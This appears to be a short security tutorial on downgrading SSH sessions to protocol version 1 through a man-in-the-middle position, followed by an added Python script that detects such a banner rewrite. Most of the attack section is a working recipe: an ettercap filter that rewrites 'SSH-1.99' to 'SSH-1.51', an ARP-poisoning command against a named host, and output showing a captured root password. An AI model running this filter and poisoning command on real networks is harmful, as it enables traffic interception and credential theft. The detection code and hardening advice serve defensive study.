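Contents
- SSH protocol version negotiation takes place when the server and client communicate
(Default: SSH-1.99 >> version 2)
- Through a MITM position, the SSH session is made to use the vulnerable version
SSH v1 VS SSH v2
0x01. Creating the filter rule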
# vi ssh_rb.ef
if ( search(DATA.data, "SSH-1.99"))
{
replace("SSH-1.99","SSH-1.51");
}
# etterfilter -o ssh_rb.ef2 ssh_rb.ef
0x02. MITM attempt
# ettercap -T -q -F ssh_rb.ef2 -M ARP /10.0.0.130/ //
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Content filters loaded from ssh_rb.ef2...
Listening on eth0... (Ethernet)
eth0 -> 00:0C:29:BF:9E:AC 10.0.0.134 255.255.255.0
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %
4 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : 10.0.0.130 00:0C:29:42:2A:82
GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
SSH : 10.0.0.130:22 -> USER: root PASS: asdfasdf
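Defender-side check for the banner rewrite shown above, as an added example that is not part of the original post: it parses the SSH identification string (RFC 4253 section 4.2) and flags a banner on the wire that advertises weaker protocol support than a baseline recorded over a trusted path. The function names and the sample banners are assumptions made for illustration.

```python
import re

# RFC 4253 section 4.2 identification string:
#   SSH-protoversion-softwareversion [SP comments] CR LF
IDENT_RE = re.compile(r"^SSH-([0-9]+)\.([0-9]+)-(\S+)(?: .*)?$")

# Higher rank = stronger guarantee about which protocol version will be spoken.
RANK = {"v1-only": 0, "v1-compat": 1, "v2-only": 2}


def classify(banner: bytes) -> str:
    """Classify the protocol support advertised by one SSH identification line."""
    text = banner.rstrip(b"\r\n").decode("ascii", errors="replace")
    m = IDENT_RE.match(text)
    if m is None:
        return "invalid"
    version = (int(m.group(1)), int(m.group(2)))
    if version == (2, 0):
        return "v2-only"
    if version == (1, 99):
        return "v1-compat"  # server speaks both, so a rewritten banner can force SSH-1
    if version[0] == 1:
        return "v1-only"
    return "unknown"


def downgrade_suspected(baseline: bytes, observed: bytes) -> bool:
    """True when the banner seen on the wire is weaker than the trusted baseline."""
    base, seen = classify(baseline), classify(observed)
    if base not in RANK or seen not in RANK:
        return False  # not comparable; treat "invalid"/"unknown" as a separate alert
    return RANK[seen] < RANK[base]


if __name__ == "__main__":
    # Constructed sample banners (the software version is a placeholder).
    trusted = b"SSH-1.99-OpenSSH_4.3\r\n"  # recorded on the server itself
    on_wire = b"SSH-1.51-OpenSSH_4.3\r\n"  # what a client behind the filter receives
    print(classify(trusted), classify(on_wire), downgrade_suspected(trusted, on_wire))
```

A `v1-compat` baseline is itself the root cause: restricting the server to protocol 2 (`Protocol 2` in sshd_config on OpenSSH releases that still ship SSH-1) leaves nothing for a rewritten banner to downgrade to.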
References
- http://superuser.egloos.com/3199639
- http://www.irongeek.com/i.php?page=security/ettercapfilter